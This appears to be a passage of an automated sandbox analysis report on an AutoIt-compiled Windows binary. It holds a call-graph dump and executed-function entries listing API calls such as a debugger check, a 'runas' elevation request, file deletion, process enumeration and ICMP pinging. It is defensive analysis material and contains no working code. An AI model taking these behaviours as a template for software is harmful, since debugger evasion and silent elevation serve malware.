LeaveCriticalSection 100181->100188 100183 ad0835 100183->100154 100184->100159 100185->100159 100186->100153 100187->100158 100188->100183 100197 ad7fb5 100189->100197 100191 ad87ea 100191->100167 100192->100165 100193->100167 100194->100171 100195->100173 100196->100175 100198 ad7fc1 ___lock_fhandle 100197->100198 100199 ad7fd7 100198->100199 100201 ad800d 100198->100201 100200 ac8d58 __flsbuf 58 API calls 100199->100200 100202 ad7fdc 100200->100202 100204 ad807e __wsopen_nolock 109 API calls 100201->100204 100203 ac8fe6 __ftell_nolock 9 API calls 100202->100203 100207 ad7fe6 ___lock_fhandle 100203->100207 100205 ad8029 100204->100205 100206 ad8052 __wsopen_helper LeaveCriticalSection 100205->100206 100206->100207 100207->100191 100209 ab4af7 100208->100209 100210 ab4bb3 LoadLibraryA 100208->100210 100209->100087 100209->100088 100210->100209 100211 ab4bc4 GetProcAddress 100210->100211 100211->100209 100213 ab4a9b 100212->100213 100214 af0923 100212->100214 100219 ac5a6d 100213->100219 100216 ab4aa9 100216->100107 100217->100101 100218->100109 100222 ac5a79 ___lock_fhandle 100219->100222 100220 ac5a8b 100250 ac8d58 58 API calls __getptd_noexit 100220->100250 100222->100220 100223 ac5ab1 100222->100223 100232 ac6e3e 100223->100232 100225 ac5a90 100251 ac8fe6 9 API calls __ftell_nolock 100225->100251 100231 ac5a9b ___lock_fhandle 100231->100216 100233 ac6e4e 100232->100233 100234 ac6e70 EnterCriticalSection 100232->100234 100233->100234 100236 ac6e56 100233->100236 100235 ac5ab7 100234->100235 100238 ac59de 100235->100238 100237 ac9e3b __lock 58 API calls 100236->100237 100237->100235 100239 ac59fc 100238->100239 100240 ac59ec 100238->100240 100245 ac5a12 100239->100245 100253 ac5af0 100239->100253 100323 ac8d58 58 API calls __getptd_noexit 100240->100323 100244 ac59f1 100252 ac5ae8 LeaveCriticalSection LeaveCriticalSection _fseek 100244->100252 100282 ac4c5d 100245->100282 100250->100225 100251->100231 100252->100231 100254 ac5afd __ftell_nolock 100253->100254 100255 ac5b2d 100254->100255 100256 ac5b15 100254->100256 100257 ac8d58 __flsbuf 58 API calls 100256->100257 100283 ac4c70 100282->100283 100287 ac4c94 100282->100287 100283->100287 100323->100244 100327 ac581d 100324->100327 100326 ab4ad5 100326->100115 100328 ac5829 ___lock_fhandle 100327->100328 100329 ac586c 100328->100329 100330 ac583f _memset 100328->100330 100331 ac5864 ___lock_fhandle 100328->100331 100332 ac6e3e __lock_file 59 API calls 100329->100332 100354 ac8d58 58 API calls __getptd_noexit 100330->100354 100331->100326 100334 ac5872 100332->100334 100340 ac563d 100334->100340 100335 ac5859 100355 ac8fe6 9 API calls __ftell_nolock 100335->100355 100342 ac5658 _memset 100340->100342 100347 ac5673 100340->100347 100341 ac5663 100445 ac8d58 58 API calls __getptd_noexit 100341->100445 100342->100341 100342->100347 100351 ac56b3 100342->100351 100344 ac5668 100446 ac8fe6 9 API calls __ftell_nolock 100344->100446 100356 ac58a6 LeaveCriticalSection LeaveCriticalSection _fseek 100347->100356 100348 ac57c4 _memset 100448 ac8d58 58 API calls __getptd_noexit 100348->100448 100350 ac4906 __flsbuf 58 API calls 100350->100351 100351->100347 100351->100348 100351->100350 100357 ad108b 100351->100357 100425 ad0dd7 100351->100425 100447 ad0ef8 58 API calls 4 library calls 100351->100447 100354->100335 100355->100331 100356->100331 100358 ad10ac 100357->100358 100359 ad10c3 100357->100359 100360 ac8d24 __dosmaperr 58 API calls 100358->100360 100361 ad17fb 100359->100361 100366 ad10fd 100359->100366 100363 ad10b1 100360->100363 100362 ac8d24 __dosmaperr 58 API calls 100361->100362 100364 ad1800 100362->100364 100365 ac8d58 __flsbuf 58 API calls 100363->100365 100367 ac8d58 __flsbuf 58 API calls 100364->100367 100371 ad10b8 100365->100371 100368 ad1105 100366->100368 100374 ad111c 100366->100374 100370 ad1111 100367->100370 100369 ac8d24 __dosmaperr 58 API calls 100368->100369 100372 ad110a 100369->100372 100373 ac8fe6 __ftell_nolock 9 API calls 100370->100373 100371->100351 100376 ac8d58 __flsbuf 58 API calls 100372->100376 100373->100371 100374->100371 100375 ad1131 100374->100375 100378 ad114b 100374->100378 100379 ad1169 100374->100379 100377 ac8d24 __dosmaperr 58 API calls 100375->100377 100376->100370 100377->100372 100378->100375 100380 ad1156 100378->100380 100381 ac8a4d __malloc_crt 58 API calls 100379->100381 100383 ad5e9b __flsbuf 58 API calls 100380->100383 100382 ad1179 100381->100382 100384 ad119c 100382->100384 100385 ad1181 100382->100385 100386 ad126a 100383->100386 100389 ad1af1 __lseeki64_nolock 60 API calls 100384->100389 100387 ac8d58 __flsbuf 58 API calls 100385->100387 100388 ad12e3 ReadFile 100386->100388 100393 ad1280 GetConsoleMode 100386->100393 100390 ad1186 100387->100390 100391 ad1305 100388->100391 100392 ad17c3 GetLastError 100388->100392 100389->100380 100394 ac8d24 __dosmaperr 58 API calls 100390->100394 100391->100392 100402 ad12d5 100391->100402 100395 ad17d0 100392->100395 100400 ad12c3 100392->100400 100396 ad1294 100393->100396 100397 ad12e0 100393->100397 100394->100371 100398 ac8d58 __flsbuf 58 API calls 100395->100398 100396->100397 100399 ad129a ReadConsoleW 100396->100399 100397->100388 100399->100402 100404 ad12bd GetLastError 100399->100404 100401 ac8d37 __dosmaperr 58 API calls 100400->100401 100408 ad12c9 100400->100408 100401->100408 100407 ad15a7 100402->100407 100402->100408 100410 ad133a 100402->100410 100404->100400 100407->100408 100408->100371 100426 ad0de2 100425->100426 100430 ad0df7 100425->100430 100427 ac8d58 __flsbuf 58 API calls 100426->100427 100428 ad0de7 100427->100428 100429 ac8fe6 __ftell_nolock 9 API calls 100428->100429 100436 ad0df2 100429->100436 100431 ad0e2c 100430->100431 100432 ad6214 __getbuf 58 API calls 100430->100432 100430->100436 100433 ac4906 __flsbuf 58 API calls 100431->100433 100432->100431 100434 ad0e40 100433->100434 100435 ad0f77 __read 72 API calls 100434->100435 100437 ad0e47 100435->100437 100436->100351 100437->100436 100438 ac4906 __flsbuf 58 API calls 100437->100438 100439 ad0e6a 100438->100439 100439->100436 100440 ac4906 __flsbuf 58 API calls 100439->100440 100441 ad0e76 100440->100441 100441->100436 100442 ac4906 __flsbuf 58 API calls 100441->100442 100445->100344 100446->100347 100447->100351 100448->100344 100452 ac542a GetSystemTimeAsFileTime 100449->100452 100451 b09529 100451->100117 100453 ac5458 __aulldiv 100452->100453 100453->100451 100455 ac5e8c ___lock_fhandle 100454->100455 100456 ac5e9e 100455->100456 100457 ac5eb3 100455->100457 100467 ac8d58 58 API calls __getptd_noexit 100456->100467 100459 ac6e3e __lock_file 59 API calls 100457->100459 100460 ac5eb9 100459->100460 100462 ac5af0 __ftell_nolock 67 API calls 100460->100462 100461 ac5ea3 100468 ac8fe6 9 API calls __ftell_nolock 100461->100468 100464 ac5ec4 100462->100464 100465 ac5eae ___lock_fhandle 100467->100461 100468->100465 100475->99924 100491->99925 100506 b09d05 __tzset_nolock _wcscmp 100501->100506 100502 b09b99 100502->100017 100502->100045 100503 ab4ab2 74 API calls 100503->100506 100504 b096c4 GetSystemTimeAsFileTime 100504->100506 100505 ab4a8c 85 API calls 100505->100506 100506->100502 100506->100503 100506->100504 100506->100505 100638 ae48fb 100639 aab020 274 API calls 100638->100639 100640 ae4912 100639->100640 100642 aacce0 100640->100642 100643 b0a48d 89 API calls 4 library calls 100640->100643 100642->100642 100643->100642 100644 aa107d 100649 ab2fc5 100644->100649 100646 aa108c 100647 ac2f70 __cinit 67 API calls 100646->100647 100648 aa1096 100647->100648 100650 ab2fd5 __ftell_nolock 100649->100650 100651 ab1207 59 API calls 100650->100651 100652 ab308b 100651->100652 100653 ac00cf 61 API calls 100652->100653 100654 ab3094 100653->100654 100680 ac08c1 100654->100680 100657 ab1900 59 API calls 100658 ab30ad 100657->100658 100659 ab4c94 59 API calls 100658->100659 100660 ab30bc 100659->100660 100661 ab1207 59 API calls 100660->100661 100662 ab30c5 100661->100662 100663 ab19e1 59 API calls 100662->100663 100664 ab30ce RegOpenKeyExW 100663->100664 100665 af01a3 RegQueryValueExW 100664->100665 100670 ab30f0 Mailbox 100664->100670 100666 af0235 RegCloseKey 100665->100666 100667 af01c0 100665->100667 100668 af0247 _wcscat Mailbox __wsetenvp 100666->100668 100666->100670 100669 ac0fe6 Mailbox 59 API calls 100667->100669 100668->100670 100675 ab1609 59 API calls 100668->100675 100678 ab1a36 59 API calls 100668->100678 100679 ab4c94 59 API calls 100668->100679 100671 af01d9 100669->100671 100670->100646 100672 ab433f 59 API calls 100671->100672 100673 af01e4 RegQueryValueExW 100672->100673 100674 af0201 100673->100674 100677 af021b 100673->100677 100676 ab1821 59 API calls 100674->100676 100675->100668 100676->100677 100677->100666 100678->100668 100679->100668 100681 ad1b70 __ftell_nolock 100680->100681 100682 ac08ce GetFullPathNameW 100681->100682 100683 ac08f0 100682->100683 100684 ab1821 59 API calls 100683->100684 100685 ab309f 100684->100685 100685->100657 100686 addc5a 100687 ac0fe6 Mailbox 59 API calls 100686->100687 100688 addc61 100687->100688 100689 ac0fe6 Mailbox 59 API calls 100688->100689 100691 addc7a _memmove 100688->100691 100689->100691 100690 ac0fe6 Mailbox 59 API calls 100692 addc9f 100690->100692 100691->100690 100693 b092c8 100694 b092d5 100693->100694 100695 b092db 100693->100695 100696 ac2f85 _free 58 API calls 100694->100696 100697 b092ec 100695->100697 100698 ac2f85 _free 58 API calls 100695->100698 100696->100695 100699 ac2f85 _free 58 API calls 100697->100699 100700 b092fe 100697->100700 100698->100697 100699->100700 100701 aa1016 100706 ab5ce7 100701->100706 100704 ac2f70 __cinit 67 API calls 100705 aa1025 100704->100705 100707 ac0fe6 Mailbox 59 API calls 100706->100707 100708 ab5cef 100707->100708 100710 aa101b 100708->100710 100713 ab5f39 100708->100713 100710->100704 100714 ab5f42 100713->100714 100716 ab5cfb 100713->100716 100715 ac2f70 __cinit 67 API calls 100714->100715 100715->100716 100717 ab5d13 100716->100717 100718 ab1207 59 API calls 100717->100718 100719 ab5d2b GetVersionExW 100718->100719 100720 ab1821 59 API calls 100719->100720 100721 ab5d6e 100720->100721 100722 ab1981 59 API calls 100721->100722 100732 ab5d9b 100721->100732 100723 ab5d8f 100722->100723 100724 ab133d 59 API calls 100723->100724 100724->100732 100725 ab5e00 GetCurrentProcess IsWow64Process 100726 ab5e19 100725->100726 100728 ab5e98 GetSystemInfo 100726->100728 100729 ab5e2f 100726->100729 100727 af1098 100730 ab5e65 100728->100730 100741 ab55f0 100729->100741 100730->100710 100732->100725 100732->100727 100734 ab5e8c GetSystemInfo 100736 ab5e56 100734->100736 100735 ab5e41 100737 ab55f0 2 API calls 100735->100737 100736->100730 100739 ab5e5c FreeLibrary 100736->100739 100738 ab5e49 GetNativeSystemInfo 100737->100738 100738->100736 100739->100730 100742 ab5619 100741->100742 100743 ab55f9 LoadLibraryA 100741->100743 100742->100734 100742->100735 100743->100742 100744 ab560a GetProcAddress 100743->100744 100744->100742 100745 aa7357 100746 aa78f5 100745->100746 100747 aa7360 100745->100747 100755 aa6fdb Mailbox 100746->100755 100756 af87f9 59 API calls _memmove 100746->100756 100747->100746 100748 aa4d37 84 API calls 100747->100748 100749 aa738b 100748->100749 100749->100746 100751 aa739b 100749->100751 100752 ab1680 59 API calls 100751->100752 100752->100755 100753 adf91b 100754 ab1c9c 59 API calls 100753->100754 100754->100755 100756->100753 100757 aa1055 100762 aa2a19 100757->100762 100760 ac2f70 __cinit 67 API calls 100761 aa1064 100760->100761 100763 ab1207 59 API calls 100762->100763 100764 aa2a87 100763->100764 100769 aa1256 100764->100769 100766 aa2b24 100768 aa105a 100766->100768 100772 aa13f8 59 API calls 2 library calls 100766->100772 100768->100760 100773 aa1284 100769->100773 100772->100766 100774 aa1275 100773->100774 100775 aa1291 100773->100775 100774->100766 100775->100774 100776 aa1298 RegOpenKeyExW 100775->100776 100776->100774 100777 aa12b2 RegQueryValueExW 100776->100777 100778 aa12e8 RegCloseKey 100777->100778 100779 aa12d3 100777->100779 100778->100774 100779->100778 100780 aa5ff5 100803 aa5ede Mailbox _memmove 100780->100803 100781 ac0fe6 59 API calls Mailbox 100781->100803 100782 aa6a9b 100906 aaa9de 274 API calls 100782->100906 100783 aa53b0 274 API calls 100783->100803 100785 adeff9 100918 aa5190 59 API calls Mailbox 100785->100918 100787 adf007 100919 b0a48d 89 API calls 4 library calls 100787->100919 100789 adefeb 100819 aa5569 Mailbox 100789->100819 100917 af6cf1 59 API calls Mailbox 100789->100917 100792 aa60e5 100793 ade137 100792->100793 100800 aa63bd Mailbox 100792->100800 100806 aa6abc 100792->100806 100818 aa6152 Mailbox 100792->100818 100793->100800 100907 af7aad 59 API calls 100793->100907 100794 ab1c9c 59 API calls 100794->100803 100796 aa523c 59 API calls 100796->100803 100798 ac0fe6 Mailbox 59 API calls 100802 aa63d1 100798->100802 100799 ab1a36 59 API calls 100799->100803 100800->100798 100809 aa6426 100800->100809 100801 b1c355 274 API calls 100801->100803 100804 aa63de 100802->100804 100802->100806 100803->100781 100803->100782 100803->100783 100803->100785 100803->100787 100803->100792 100803->100794 100803->100796 100803->100799 100803->100801 100803->100806 100803->100819 100910 b07f11 59 API calls Mailbox 100803->100910 100911 af6cf1 59 API calls Mailbox 100803->100911 100807 aa6413 100804->100807 100808 ade172 100804->100808 100916 b0a48d 89 API calls 4 library calls 100806->100916 100807->100809 100834 aa5447 Mailbox 100807->100834 100908 b1c87c 85 API calls 2 library calls 100808->100908 100909 b1c9c9 95 API calls Mailbox 100809->100909 100813 ade19d 100813->100813 100814 ac0fe6 59 API calls Mailbox 100814->100834 100816 adf165 100921 b0a48d 89 API calls 4 library calls 100816->100921 100817 ade691 100913 b0a48d 89 API calls 4 library calls 100817->100913 100818->100789 100818->100806 100818->100819 100826 ade2e9 VariantClear 100818->100826 100846 b1e60c 130 API calls 100818->100846 100847 b1ec68 100818->100847 100855 aacfd7 100818->100855 100874 b15e1d 100818->100874 100899 b1ebba 100818->100899 100905 aa5190 59 API calls Mailbox 100818->100905 100912 af7aad 59 API calls 100818->100912 100820 aa6e30 60 API calls 100820->100834 100822 aa69fa 100830 ab1c9c 59 API calls 100822->100830 100824 ab1c9c 59 API calls 100824->100834 100825 ade6a0 100826->100818 100827 adea9a 100831 ab1c9c 59 API calls 100827->100831 100828 aa69ff 100828->100816 100828->100817 100830->100819 100831->100819 100832 aa7e50 274 API calls 100832->100834 100833 ab1207 59 API calls 100833->100834 100834->100814 100834->100817 100834->100819 100834->100820 100834->100822 100834->100824 100834->100827 100834->100828 100834->100832 100834->100833 100835 adeb67 100834->100835 100836 af7aad 59 API calls 100834->100836 100838 ac2f70 67 API calls __cinit 100834->100838 100839 adef28 100834->100839 100841 aa5a1a 100834->100841 100835->100819 100914 af7aad 59 API calls 100835->100914 100836->100834 100838->100834 100915 b0a48d 89 API calls 4 library calls 100839->100915 100920 b0a48d 89 API calls 4 library calls 100841->100920 100846->100818 100849 b1ecab 100847->100849 100854 b1ec84 100847->100854 100848 b1eccd 100852 b1ed11 100848->100852 100848->100854 100926 aa502b 59 API calls 100848->100926 100849->100848 100925 aa502b 59 API calls 100849->100925 100922 b067fc 100852->100922 100854->100818 100856 aa4d37 84 API calls 100855->100856 100857 aad001 100856->100857 100858 aa5278 59 API calls 100857->100858 100859 aad018 100858->100859 100860 aad57b 100859->100860 100866 aad439 Mailbox __wsetenvp 100859->100866 100927 aa502b 59 API calls 100859->100927 100860->100818 100862 ac312d _W_store_winword 60 API calls 100862->100866 100863 ab162d 59 API calls 100863->100866 100864 aa4f98 59 API calls 100864->100866 100865 ac0c65 62 API calls 100865->100866 100866->100860 100866->100862 100866->100863 100866->100864 100866->100865 100869 aa4d37 84 API calls 100866->100869 100870 aa502b 59 API calls 100866->100870 100871 ab1821 59 API calls 100866->100871 100872 ab59d3 94 API calls 100866->100872 100873 ab5ac3 Shell_NotifyIconW 100866->100873 100928 ab153b 59 API calls 2 library calls 100866->100928 100929 aa4f3c 59 API calls Mailbox 100866->100929 100869->100866 100870->100866 100871->100866 100872->100866 100873->100866 100875 b15e46 100874->100875 100876 b15e74 WSAStartup 100875->100876 100943 aa502b 59 API calls 100875->100943 100878 b15e9d 100876->100878 100898 b15e88 Mailbox 100876->100898 100930 ab40cd 100878->100930 100880 b15e61 100880->100876 100944 aa502b 59 API calls 100880->100944 100882 aa4d37 84 API calls 100884 b15eb2 100882->100884 100935 ab402a WideCharToMultiByte 100884->100935 100885 b15e70 100885->100876 100887 b15ebf inet_addr gethostbyname 100888 b15edd IcmpCreateFile 100887->100888 100887->100898 100889 b15f01 100888->100889 100888->100898 100890 ac0fe6 Mailbox 59 API calls 100889->100890 100891 b15f1a 100890->100891 100892 ab433f 59 API calls 100891->100892 100893 b15f25 100892->100893 100894 b15f55 IcmpSendEcho 100893->100894 100895 b15f34 IcmpSendEcho 100893->100895 100896 b15f6d 100894->100896 100895->100896 100897 b15fd4 IcmpCloseHandle WSACleanup 100896->100897 100897->100898 100898->100818 100900 b1ebcd 100899->100900 100901 aa4d37 84 API calls 100900->100901 100904 b1ebdc 100900->100904 100902 b1ec0a 100901->100902 100947 b07ce4 100902->100947 100904->100818 100905->100818 100906->100806 100907->100800 100908->100809 100909->100813 100910->100803 100911->100803 100912->100818 100913->100825 100914->100819 100915->100841 100916->100789 100917->100819 100918->100789 100919->100789 100920->100819 100921->100819 100923 b06818 92 API calls 100922->100923 100924 b06813 100923->100924 100924->100854 100925->100848 100926->100852 100927->100866 100928->100866 100929->100866 100931 ac0fe6 Mailbox 59 API calls 100930->100931 100932 ab40e0 100931->100932 100933 ab1c7e 59 API calls 100932->100933 100934 ab40ed 100933->100934 100934->100882 100936 ab404e 100935->100936 100937 ab4085 100935->100937 100938 ac0fe6 Mailbox 59 API calls 100936->100938 100946 ab3f20 59 API calls Mailbox 100937->100946 100940 ab4055 WideCharToMultiByte 100938->100940 100945 ab3f79 59 API calls 2 library calls 100940->100945 100942 ab4077 100942->100887 100943->100880 100944->100885 100945->100942 100946->100942 100948 b07cf1 100947->100948 100949 ac0fe6 Mailbox 59 API calls 100948->100949 100950 b07cf8 100949->100950 100953 b06135 100950->100953 100952 b07d3b Mailbox 100952->100904 100954 ab1aa4 59 API calls 100953->100954 100955 b06148 CharLowerBuffW 100954->100955 100958 b0615b 100955->100958 100956 ab1609 59 API calls 100956->100958 100957 b06195 100959 b061a7 100957->100959 100961 ab1609 59 API calls 100957->100961 100958->100956 100958->100957 100970 b06165 _memset Mailbox 100958->100970 100960 ac0fe6 Mailbox 59 API calls 100959->100960 100964 b061d5 100960->100964 100961->100959 100966 b061f4 100964->100966 100986 b06071 59 API calls 100964->100986 100965 b06233 100967 ac0fe6 Mailbox 59 API calls 100965->100967 100965->100970 100971 b06292 100966->100971 100968 b0624d 100967->100968 100969 ac0fe6 Mailbox 59 API calls 100968->100969 100969->100970 100970->100952 100972 ab1207 59 API calls 100971->100972 100973 b062c4 100972->100973 100974 ab1207 59 API calls 100973->100974 100975 b062cd 100974->100975 100976 ab1207 59 API calls 100975->100976 100983 b062d6 _wcscmp 100976->100983 100977 b065ab Mailbox 100977->100965 100978 ac3836 GetStringTypeW 100978->100983 100979 ab1821 59 API calls 100979->100983 100980 ab153b 59 API calls 100980->100983 100982 ac37ba 59 API calls 100982->100983 100983->100977 100983->100978 100983->100979 100983->100980 100983->100982 100984 b06292 60 API calls 100983->100984 100985 ab1c9c 59 API calls 100983->100985 100987 ac385c GetStringTypeW _iswctype 100983->100987 100984->100983 100985->100983 100986->100964 100987->100983

                                                                                        Executed Functions

                                                                                        Function 00AB5240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AB526C
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00AB527E
                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00AB52E6
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                          • Part of subcall function 00AABBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AABC07
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB5366
                                                                                        • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00AF0B2E
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AF0B66
                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B56D10), ref: 00AF0BE9
                                                                                        • ShellExecuteW.SHELL32(00000000), ref: 00AF0BF0
                                                                                          • Part of subcall function 00AB514C: GetSysColorBrush.USER32(0000000F), ref: 00AB5156
                                                                                          • Part of subcall function 00AB514C: LoadCursorW.USER32(00000000,00007F00), ref: 00AB5165
                                                                                          • Part of subcall function 00AB514C: LoadIconW.USER32(00000063), ref: 00AB517C
                                                                                          • Part of subcall function 00AB514C: LoadIconW.USER32(000000A4), ref: 00AB518E
                                                                                          • Part of subcall function 00AB514C: LoadIconW.USER32(000000A2), ref: 00AB51A0
                                                                                          • Part of subcall function 00AB514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AB51C6
                                                                                          • Part of subcall function 00AB514C: RegisterClassExW.USER32(?), ref: 00AB521C
                                                                                          • Part of subcall function 00AB50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AB5109
                                                                                          • Part of subcall function 00AB50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AB512A
                                                                                          • Part of subcall function 00AB50DB: ShowWindow.USER32(00000000), ref: 00AB513E
                                                                                          • Part of subcall function 00AB50DB: ShowWindow.USER32(00000000), ref: 00AB5147
                                                                                          • Part of subcall function 00AB59D3: _memset.LIBCMT ref: 00AB59F9
                                                                                          • Part of subcall function 00AB59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AB5A9E
                                                                                        Strings
                                                                                        • AutoIt, xrefs: 00AF0B23
                                                                                        • runas, xrefs: 00AF0BE4
                                                                                        • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00AF0B28
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                        • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                        • API String ID: 529118366-2030392706
                                                                                        • Opcode ID: f16595d0b14e2348e007bd137f74b49371a2025e0637856323ccf2e416489cfc
                                                                                        • Instruction ID: 9f1512646105e9d5598054ffb35107094d177aaa7bb1c84c640ae3936414db00
                                                                                        • Opcode Fuzzy Hash: f16595d0b14e2348e007bd137f74b49371a2025e0637856323ccf2e416489cfc
                                                                                        • Instruction Fuzzy Hash: 1951D031D88248AACF11ABF0DD76EFE7BBCAF06344B1001A5F551672A3DEB84944CB21
                                                                                        Function 00AB5D13 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetVersionExW.KERNEL32(?), ref: 00AB5D40
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                        • GetCurrentProcess.KERNEL32(?,00B30A18,00000000,00000000,?), ref: 00AB5E07
                                                                                        • IsWow64Process.KERNEL32(00000000), ref: 00AB5E0E
                                                                                        • GetNativeSystemInfo.KERNEL32(00000000), ref: 00AB5E54
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00AB5E5F
                                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00AB5E90
                                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00AB5E9C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1986165174-0
                                                                                        • Opcode ID: a1ff261a93b37dc7bd55b4784245c8c01db2fb209d8269a2da762ff03a9b2ca1
                                                                                        • Instruction ID: 710af50550e72c0e6ca5e86e9047458b0b6eb99a179b4b0b9ef2c3e2af0e143f
                                                                                        • Opcode Fuzzy Hash: a1ff261a93b37dc7bd55b4784245c8c01db2fb209d8269a2da762ff03a9b2ca1
                                                                                        • Instruction Fuzzy Hash: 7091B431949BC4DEC732DB7884616EABFF96F25300B980A5EE0C793A42D630F648C759
                                                                                        Function 00B04005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AC0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB2A58,?,00008000), ref: 00AC02A4
                                                                                          • Part of subcall function 00B04FEC: GetFileAttributesW.KERNEL32(?,00B03BFE), ref: 00B04FED
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B0407C
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00B040CC
                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00B040DD
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B040F4
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B040FD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 2649000838-1173974218
                                                                                        • Opcode ID: 39e1938bd0621943543e66ab1b6ad2cfddc2d5dd23782581f80a285d781eca5b
                                                                                        • Instruction ID: efd27bbc64aac220b0cf459f108500f774382d73192c8391ec53d3fb06307b10
                                                                                        • Opcode Fuzzy Hash: 39e1938bd0621943543e66ab1b6ad2cfddc2d5dd23782581f80a285d781eca5b
                                                                                        • Instruction Fuzzy Hash: 153162710183859BC305EF60C9A5DEFBBECBE95304F440A6DF5D5931D2EB219909C752
                                                                                        Function 00B04148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00B0416D
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00B0417B
                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00B0419B
                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 00B04245
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
